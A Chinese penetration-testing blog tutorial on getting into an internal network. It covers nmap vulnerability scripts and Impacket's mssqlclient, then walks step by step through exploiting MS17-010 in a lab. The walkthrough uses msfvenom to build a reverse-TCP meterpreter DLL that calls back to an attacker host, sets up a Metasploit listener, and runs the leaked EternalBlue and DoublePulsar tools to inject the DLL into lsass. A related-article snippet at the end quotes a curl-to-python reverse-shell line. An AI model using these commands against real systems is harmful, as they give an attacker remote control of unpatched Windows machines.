打点-进入内网(一)

最新推荐文章于 2023-07-09 11:49:43 发布
最新推荐文章于 2023-07-09 11:49:43 发布
阅读量637 收藏 2
点赞数
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44555676/article/details/119861375
版权

应用系统漏洞利用

常见漏洞扫描

1.Nmap扫描技巧

  • auth 处理身份验证
  • broadcast 网络广播
  • brute 暴力猜解
  • default 默认
  • discovery 服务发现
  • dos 拒绝服务
  • exploit 漏洞利用
  • external 外部扩展
  • fuzzer 模糊测试
  • intrusive 扫描可能造成不良后果
  • malware 检测后门
  • safe 扫描危害较小
  • version 版本识别
  • vuln漏洞检测

通用参数- vuln

nmap --script=vuln 192.168.70.147

在这里插入图片描述
MS17-010

nmap --script=smb-vuln-ms17-010 192.168.70.147

在这里插入图片描述

2.impacket框架之mssql服务器安全检测

    在实际渗透测试工作中经常会遇到检测项目中mssql服务器安全性
impacket框架:https://github.com/SecureAuthCorp/impacket

mssglclient与其他工具相比的优势

  • 跨平台,python脚本编写,并且已有exe版本
  • 命令行执行,速度快
  • 支持使用socks代理传输数据
  • 支持以hash传递的方式进行账号验证
  • 支持Windows认证模式进行mssql服务的安全检测
  • 执行sql命令可以是交互式,也可以直接回显sql命令执行结果

Mssqlclient的基本使用命令为

验证以Windows认证模式的mssql服务

python mssqlclient.py domain/username:password@ip -windows-auth

验证以mssql账号密码认证的mssql服务

python mssqlclient.py ./username:password@ip

验证以mssql账号密码认证的mssql服务,并执行command.txt内的sql命令

python mssqlclient.py ./username:password@ip -file command . txt

Impacket网络协议工具包安装

Kali Linux安装Impacket

我们通过git clone命令克隆存储库

git clone https://github.com/SecureAuthCorp/impacket  
cd impacket/
python setup.py install

在这里插入图片描述

查看工具

cd impacket/examples
ls

在这里插入图片描述

Windows安装Impacket

在这个github上直接下载即可
https://github.com/maaaaz/impacket-examples-windows

在这里插入图片描述

3.MS17_010 py脚本利用

前言
为什么要介绍用py脚本?因为有些机器存在漏洞,但是使用MSF的模块利用失败,而使用py脚本则能成功利用。

利用

在本地用虚拟机搭建了Kali和windows7系统
192.168.70.147 虚拟机XP(需安装Python2.6.6和pywin32安装包 )
192.168.70.11 虚拟机Kali IP
192.168.70.130 虚拟机windows7 IP
即:192.168.70.147 是操作机 192.168.70.130是靶机

在kali中用metasploit生成64位的dll

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.70.11 LPORT=8089 -f dll >reverser_tcp_64.dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.11 LPORT=8089 -f dll >reverser_tcp_64.dll

192.168.70.11 是Kali的IP, LPORT可以随意设置。但是之后的LPORT必须与此时设置的端口要一致!

生成了dll
在这里插入图片描述

msfconsole   //进入控制台
use exploit/multi/handler //使用监听模块
set payload windows/x64/meterpreter/reverse_tcp //设置payload
show options //查看配置信息
set LHOST 192.168.70.11 //设置本地IP
set LPORT 8089 //设置本地端口
run //运行

在这里插入图片描述

下载shadowbroker:https://github.com/root-tools/shadowbroker
进入shadowbroker文件夹下的windows文件夹内先创建一个listeningposts的空文件夹打开fb.py,否则会报错
在这里插入图片描述

在这里插入图片描述
设置全局参数
Default Target IP Address(默认靶机IP): 192.168.70.130
Default Callback IP Address(默认监控主机IP): 192.168.70.11
Use Redirection(使用重定向): no
Set LogDir(设置日志路径): c:\logs
Project(0是创建一个新的项目):0
New Project Name(项目名称):Test_Win7
在这里插入图片描述
use Eternalblue使用Eternalblue插件
使用EternalBlue攻击靶机,这里需要注意的是,事先要确定靶机的操作系统,这个类型要做选择。

use Eternalblue

在这里插入图片描述
一路回车
在这里插入图片描述
这里根据目标的系统选择0或1,因为靶机是win7,所以选1
在这里插入图片描述
这里要选择攻击方式,选择FB,即1
在这里插入图片描述
成功调用插件
在这里插入图片描述
接下来使用doublepulsar插件
与EternalBlue一样,需要选择靶机系统类型。
ProcessName [lsass.exe]者一项是默认,否则无法运行后门。

use doublepulsar

在这里插入图片描述
一路回车
在这里插入图片描述
这里选择smb方式
在这里插入图片描述
这里选择x64
在这里插入图片描述
这里选择dll
在这里插入图片描述
这里写dll文件的路径
在这里插入图片描述

在这里插入图片描述

一路回车
在这里插入图片描述
在这里插入图片描述

成功
在这里插入图片描述
在这里插入图片描述

Y小短腿
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HTB TIER 2 Archetype wp
qq_40952713的博客
03-25 1161
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录所用工具一、信息收集二、寻找falg1.使用mssqlclient.py连接到mssql2.拿shell3.提权总结 所用工具 nmap mssqlclient.py psexec.py nc.exe metasploit winPEAS.bat 工具下载链接在文中 一、信息收集 使用nmap对目标靶机进行扫描 nmap -A -T4 -v 10.129.171.38 发现目标主机开启了smb、sql server服务 尝试.
InScan:边界打点后的自动化渗透工具
04-12
InScan开源扫描器 简介 本工具只可用于安全测试,勿用于非法用途! 工具定位 边界打点后的自动化内网工具,完全与服务端脱离。服务端只用于生成poc,网段信息等配置。 内网渗透痛点 目前已有的扫描器,依赖库较多,体积过于庞大,在内网渗透中,很多极端情况无法安装扫描器,使用socks4/socks5代理扫描的话,时间久,效率低。 InScan优点 多平台,单一的二进制文件,免依赖; 支持自动可视化多级隧道,通过后台按钮开关即可穿越多层网络; 支持ipv6的扫描器; 快速直观查看多网卡机器,方便快速定位能穿多层网络机器; 通过已知密码生成社工字典,快速横向内网; 内网B/S架构系统自动化爆破,验证码自动识别; 快速资产识别,站点截图; 通过扫描到的资产自动化进行网站目录扫描; InScan支持平台 全平台支持,一个二进制文件,开箱即用。 命令行启动 -pocPort int
打点-进入内网(二)
qq_44555676的博客
08-28 359
未授权访问漏洞前言一、Redis1.Ubuntu中搭建Redis服务器安装检查Redis服务器系统进程通过启动命令检查Redis服务器状态通过命令行客户端访问Redis修改Redis的配置2.Kall下redis-cli的安装3.写入文件4.反弹shell - Linux5.写入公钥6.清空数据库 前言 这类问题覆盖的应用、利用方式较广,因此只举例频次较高的漏洞。 一、Redis Redis是一个开源的使用ANSI C语言编写、支持网绍、可基于内存亦可持久化的日志型、Key-Value数据库。 1.U
内网自动化快速打点工具
weixin_46211944的博客
12-28 157
自定义Password字典 自动合并到程序内置。服务弱口令探测模块 支持 Redis 未授权。服务弱口令探测模块 支持 Mongodb。服务弱口令探测模块 支持 Oracle。服务弱口令探测模块 支持 Mysql。服务弱口令探测模块 支持 Mssql。服务弱口令探测模块 支持 SSH。服务弱口令探测模块 支持 FTP。服务弱口令探测模块 支持 SMB。解析Xray POC V1模版。ICMP并发探测存活IP。集成Xray POC扫描。并发探测主机服务弱口令。并发探测主机端口服务。内网自动化快速打点工具。
网络安全打点是什么意思
山兔的博客
05-22 870
打点,指的是IP地址收集和端口信息收集
【学习笔记】进入内网的几种方法
chualam的博客
10-29 3247
当可以通过ssh连接A 目标访问B ssh ip -lrr //空密码连接 ssh ip -D端口 -CNfg(流量压缩) //端口转发 >>export all_proxy=http://127.0.0.1:端口 当不可以通过ssh 下载反弹shell 的py脚本 通过py启动http (python -m SimpleHTTPServer) curl A的ip/shell.php --data "c=system("curl 我的vps的ip/xx.py|python");" nc -l.
行业分类-设备装置-一种笔头打点机.zip
09-10
行业分类-设备装置-一种笔头打点机.zip
红队渗透打点工具-FindUpload
最新发布
03-07
FindUpload是一款红队打点工具,帮助渗透测试人员批量url快速发现文件上传点和登录框,提高渗透测试效率和减少手工发现时间。
行业分类-设备装置-一种自动打点夹具及利用打点夹具进行打点的方法.zip
09-05
行业分类-设备装置-一种自动打点夹具及利用打点夹具进行打点的方法.zip
swift-LPMAutoStatistics一个自动打点追踪的系统
08-15
LPMAutoStatistics 一个自动打点追踪的系统
行业分类-物理装置-一种全自动钢筋打点机.zip
09-09
行业分类-物理装置-一种全自动钢筋打点机.zip
ATT&CK实战系列-从web打点内网渗透
weixin_53884648的博客
10-14 1682
从搭建环境到shell连接,我们从外网到达内网,从内网cs上线,到横向移动,派生等
Notes Ninth Day-渗透攻击-红队-打入内网
qq_34801745的博客
09-25 7981
** Notes Ninth Day-渗透攻击-红队-打入内网(dayu) ** 作者:大余 时间:2020-09-25 请注意:对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 我必须再重申一遍:务必不要做未授权测试!不要未经授权在真实网络环境中复现任何本书中描述的攻击。即使是出于好奇而不是恶意,你仍然会因未授权测试行为而陷入很多麻烦。为了个人能更好的继
红队快速批量打点的工具
hackzkaq的博客
11-08 806
搜索公众号:白帽子左一,领配套练手靶场,全套安全课程及工具 一种针对较多资产或目标的情况下进行批量识别目标框架进行针对性漏洞挖掘的方式。用得好可能其它队伍还在辛辛苦苦打点的时候,你已经进内网了。 正文 最近 EHole 更新了3.0版本,提供了 finger 与 fofaext 参数,fofaext参数主要从fofa进行批量获取 IP 的端口情况,而 finger 则进行批量进行指纹验证识别。 EHole地址:https://github.com/EdgeSecurityTeam/EHole 目前开源的
三层内网 外网打点内网域 sec123 复现
qq_53742230的博客
08-26 3328
本次项目模拟渗透测试人员在授权的情况下,对目标进行渗透测试,从外网打点内网横向渗透,最终获取整个内网权限。本次项目属于三层代理内网穿透,会学习到各种内网穿透技术,cobalt strike在内网中各种横行方法,也会学习到在工具利用失败的情况下,手写exp获取边界突破点,详细介绍外网各种打点方法。jsp 代码审计编写解密脚本frp 端口映射的使用fscan 内网扫描器的使用cobalt strike 的使用hydra 爆破神器的使用1433 MSSQL 爆破MSSQL 执行cmd命令。...
轻松搭建从web打点内网穿透简易实验环境
markecheng的博客
11-24 514
标题:内网环境搭建,实现从web打点内网穿透基础环境 前言: 各位师傅们好,这是我的第一篇文章,我做一个自我介绍,我叫phononer,是一个小白,会将一些自己在内网搭环境实战中呢,遇到的一些坑和操作,将会全部展示出来,希望给各位看到这篇文章的师傅们一些小小帮助,没有帮助,那就是师傅们功力太高深了,如果有帮助呢,在下不胜荣幸。 在现实中,我们很少能在工作中获得权限去打内网,所以,我会一步一步的从最简单的内网环境搭建,到内网穿透,再到域环境等等,一步步的展示。 内网环境搭建使用机器以及网络条件: windo
网络安全之信息收集/打点技术
北冥同学的成长记录笔记
07-09 1022
《孙子兵法》中写道:知己知彼,百战不殆。信息收集是网络攻击或是渗透测试中的第一步,也是最关键的阶段,同时也是耗费时间最长的阶段。换句话说:渗透测试/网络攻击的本质就是信息收集。
Impacket官方使用指南
weixin_30877755的博客
04-09 2802
什么是Impacket Impacket是用于处理网络协议的Python类的集合。Impacket专注于提供对数据包的简单编程访问,以及协议实现本身的某些协议(例如SMB1-3和MSRPC)。数据包可以从头开始构建,也可以从原始数据中解析,而面向对象的API使处理协议的深层次结构变得简单。该库提供了一组工具,作为在此库找到可以执行的操作的示例。 有关某些工具的说明,请访问:https:/...
hack the box archetype 靶场练习
鸥鹭忘机
07-28 1326
连接靶机 首先下载openvpn的配置文件,建议使用UDP协议进行连接,如果使用TCP协议连接,在最后提权的一步提权的时候可能会失败。 总starting point中找到靶机archetype,并点击Join Machine开启靶机。当靶机启动后会显示该靶机的IP地址。但是现在还不能访问该IP地址。需要建立vpn隧道后才能通信。 通过openvpn连接到hack the box的服务器。 openvpn starting_point_rpsate.ovpn 其中starting_point_rpsa
uni-app地图打点
07-28
在uni-app中实现地图打点功能,你可以使用uni-app的原生API结合第三方地图插件来实现。以下是一种常见的实现方法: 1. 首先,在uni-app项目中安装并引入第三方地图插件,例如腾讯地图或百度地图。你可以通过uni-app插件市场或者npm进行安装。 2. 在需要使用地图的页面中,引入地图组件,并在data中定义相关变量,如下所示: ```vue <template> <view> <map :longitude="longitude" :latitude="latitude" :markers="markers"></map> </view> </template> <script> export default { data() { return { longitude: 0, // 经度 latitude: 0, // 纬度 markers: [], // 打点信息 }; }, }; </script> ``` 3. 在页面的`onLoad`生命周期钩子中获取用户当前位置的经纬度,并将其赋值给`longitude`和`latitude`变量: ```javascript onLoad() { uni.getLocation({ type: 'gcj02', success: (res) => { this.longitude = res.longitude; this.latitude = res.latitude; }, }); }, ``` 4. 在需要进行打点的位置,通过调用第三方地图插件的相关API来添加打点,例如: ```javascript addMarker() { const marker = { id: '1', latitude: 39.908823, longitude: 116.397470, title: 'Marker1', iconPath: 'path/to/icon.png', width: 20, height: 20, }; this.markers.push(marker); }, ``` 5. 最后,在页面中调用`addMarker`方法来添加打点,即可在地图上显示打点信息。 这是一个简单的示例,你可以根据自己的需求进行扩展和优化。记得根据使用的地图插件的文档来使用相应的API。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值